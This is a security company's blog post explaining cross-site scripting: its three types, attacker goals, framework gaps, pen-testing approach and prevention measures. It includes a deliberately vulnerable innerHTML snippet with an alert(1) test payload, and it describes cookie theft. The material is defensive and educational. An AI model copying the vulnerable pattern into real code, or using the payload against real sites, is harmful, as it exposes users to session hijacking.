Kuboid Secure Layer LogoKuboid Secure Layer
Back to Intelligence
February 27, 2026Vinay KumarXSS

Cross-Site Scripting (XSS) Explained — Why It's Still Dangerous in 2026

Cover Image for Cross-Site Scripting (XSS) Explained — Why It's Still Dangerous in 2026

Cross-Site Scripting (XSS) Explained — Why It's Still Dangerous in 2026

TLDR: A comment on a product review page. An innocent-looking text field. But the developer hadn't encoded the output. The "comment" was a JavaScript payload — and every user who loaded that product page had their session cookie silently forwarded to an attacker's server. 2,400 users over 6 days before it was discovered. XSS has been in the OWASP Top 10 for over two decades. Modern frameworks reduced its frequency — they didn't eliminate it. Here's how it still works, where modern protections fall short, and what to do about it.


What XSS Is — And Why It's Still Relevant

Cross-Site Scripting (XSS) occurs when an application takes untrusted input — from a user, a URL parameter, a database field — and renders it in a browser without properly encoding it. The result: the browser executes attacker-controlled JavaScript in the context of your application, with access to everything your JavaScript legitimately has access to — cookies, session tokens, the DOM, the ability to make authenticated requests.

The reason it persists after 25 years is the same reason most web vulnerabilities persist: it's a consequence of how the web was built. Browsers execute JavaScript. Applications render dynamic content. The gap between "render this content" and "execute this content" is narrow, and closing it requires consistent, correct output encoding at every point where dynamic data touches HTML, JavaScript, or URLs. One missed location is enough.

Despite frameworks improving the baseline, XSS consistently appears in Verizon's and OWASP's research as a top-five finding in web application assessments. It appears regularly in bug bounty programmes at major companies. And it appeared in our review last quarter in an application built entirely on React — a framework specifically designed to prevent it.


Three Types of XSS, With Real Examples

Stored XSS is the most dangerous variant. The malicious payload is submitted through user input, stored in the application's database, and then rendered for every subsequent user who views that content. The comment field example from the opening hook is stored XSS — one submission, thousands of victims, no further attacker interaction required.

A real-world illustration: imagine a support ticket system where the description field isn't properly encoded. An attacker submits a ticket with a JavaScript payload in the description. Every support agent who opens that ticket executes the script — potentially giving an attacker session tokens for accounts with admin-level access.

Reflected XSS doesn't persist — the payload is embedded in a URL and reflected back to whoever clicks that URL. A search page that displays "You searched for: [query]" without encoding the query value is a classic candidate. An attacker crafts a malicious URL, distributes it via phishing or social media, and every user who clicks it executes the payload in their session.

The impact is scoped to whoever clicks the link — but combined with a targeted phishing campaign, reflected XSS against a high-value user (a finance manager, an admin) can be highly effective.

DOM-based XSS is the subtlest variant and the one modern developers most commonly miss. The payload never reaches the server — it's processed entirely in the browser by JavaScript that reads from attacker-controlled sources (URL fragments, window.location, document.referrer) and writes to dangerous sinks (innerHTML, document.write, eval). Server-side protections and WAF rules don't see it because it never passes through the server.

// Vulnerable — reads from URL hash, writes to innerHTML
const search = location.hash.substring(1);
document.getElementById('results').innerHTML = 'Results for: ' + search;

// URL: https://example.com/search#<img src=x onerror=alert(1)>
// The browser executes the onerror handler — server saw nothing

What Attackers Actually Do With XSS

Cookie theft for session hijacking is the classic exploit — a script that reads document.cookie and sends it to an attacker-controlled server. The attacker loads that cookie in their own browser and is immediately authenticated as the victim, no password required. This is the mechanism behind the 2,400-user incident in the opening hook.

Beyond session theft, a persistent XSS payload on a heavily trafficked page gives an attacker a JavaScript execution context in thousands of browsers simultaneously. They can: redirect users to credential phishing pages that look identical to your login form; inject fake form fields that harvest passwords as users type; load external scripts that install browser-based cryptominers; modify page content for defacement or disinformation; or make authenticated API requests on behalf of the victim — silently, invisibly, from within the trusted origin of your own application.

The last one deserves emphasis: because XSS executes in the context of your domain, it bypasses same-origin policy. An XSS payload can call your authenticated API endpoints as the victim, with the victim's credentials, and the server has no way to distinguish these requests from legitimate ones.


Why Modern Frameworks Help But Don't Fully Protect You

React, Vue, and Angular all perform automatic output encoding by default when you render variables into templates. {userInput} in React is rendered as text, not HTML — angle brackets become &lt; and &gt;, breaking any injected HTML or script tags. This eliminates the majority of XSS vectors in a correctly written component.

The gaps:

dangerouslySetInnerHTML in React. The name is a warning. Developers use it when they need to render HTML content — rich text from a CMS, formatted content from a database. When that content contains untrusted user data and hasn't been sanitised before rendering, XSS is the result. I find this pattern regularly in applications where rich text editing is a feature.

innerHTML, outerHTML, document.write in vanilla JavaScript or jQuery still present within modern applications. Framework components exist alongside legacy JavaScript in the majority of real codebases.

Template literals and string concatenation in JavaScript that construct HTML strings and insert them into the DOM rather than using framework-managed rendering.

Server-side rendering with unencoded output — any server-side template that concatenates user data into HTML without encoding (Jinja2, EJS, Handlebars) is vulnerable regardless of what the frontend framework is doing.

A React frontend doesn't protect a Node.js/EJS server-side rendering layer or a legacy jQuery component that's still present in the codebase.


How I Test for XSS During a Pen Test

The manual technique is straightforward to describe — though systematic application takes time.

Every input field, URL parameter, HTTP header, and form element that might be reflected back to the page is a candidate. I start with a canary value — a unique, obviously fake string like xss-test-7f3a — submitted to each input. Then I search the rendered HTML for where that value appears and in what context: inside an HTML attribute, between HTML tags, inside a JavaScript string, inside a URL.

The context determines the payload. An injection inside an HTML attribute needs a different payload than one between tags or inside a JavaScript string. The goal isn't to trigger alert(1) — it's to understand the injection context and demonstrate that JavaScript execution is achievable.

For DOM XSS specifically: I review the JavaScript source for dangerous sinks (innerHTML, eval, setTimeout with string arguments) and trace back whether any of them receive data from attacker-controllable sources. This is where automated scanners frequently miss findings — DOM XSS requires code-reading, not just HTTP traffic analysis.


How to Prevent XSS

Output encoding everywhere, consistently. Every place where dynamic data is rendered into HTML, JavaScript, or URL contexts must encode that data appropriately for that context. HTML encoding, JavaScript encoding, and URL encoding are distinct — a value correctly encoded for HTML is not necessarily safe in a JavaScript string context.

Content Security Policy (CSP). A properly configured CSP header instructs the browser to only execute JavaScript from trusted sources, blocking inline script execution and external script loads from unrecognised domains. CSP doesn't prevent XSS from occurring — it limits what a successful XSS payload can do. It's a defence-in-depth measure, not a replacement for correct encoding. Test your CSP configuration at csp-evaluator.withgoogle.com.

Use framework rendering correctly. In React, never use dangerouslySetInnerHTML with untrusted content. If you must render HTML from a database or CMS, sanitise it server-side with a library like DOMPurify before storing or rendering it.

Audit uses of innerHTML and equivalent sinks. Run grep -r "innerHTML\|outerHTML\|document\.write\|eval(" ./src across your codebase and review each occurrence. Most will be legitimate — a few will be accepting untrusted data.

Set the HttpOnly flag on session cookies. This doesn't prevent XSS — it prevents the most common XSS exploit. A session cookie with HttpOnly cannot be read by JavaScript, so cookie theft via document.cookie is blocked. This is a one-line configuration change that meaningfully limits XSS impact.


Is Your Output Encoding Solid?

The challenge with XSS is scale — a large application has hundreds of input surfaces, and every single one needs to handle untrusted data correctly. One missed location, one legacy component, one dangerouslySetInnerHTML accepting the wrong input, is enough.

A focused XSS assessment maps every injection surface in your application and tests each one systematically — including DOM-based variants that automated scanners miss. If you want to verify your output encoding is consistent across your entire application, get in touch and we'll scope what that review looks like for your stack.

You can explore our full services, read more about how we work, or browse more technical guides on the Kuboid blog.


Kuboid Secure Layer provides web application security assessments for product teams and startups. Visit www.kuboid.in to learn more.

Vinay Kumar
Vinay Kumar
Security Researcher @ Kuboid
Get In Touch

Let's find your vulnerabilities before they do.

Tell us about your product and we'll tell you what we'd attack first. Free consultation, no commitment.

  • 📧support@kuboid.in
  • ⏱️Typical response within 24 hours
  • 🌍Serving clients globally from India
  • 🔒NDA available before any discussion
Loading form...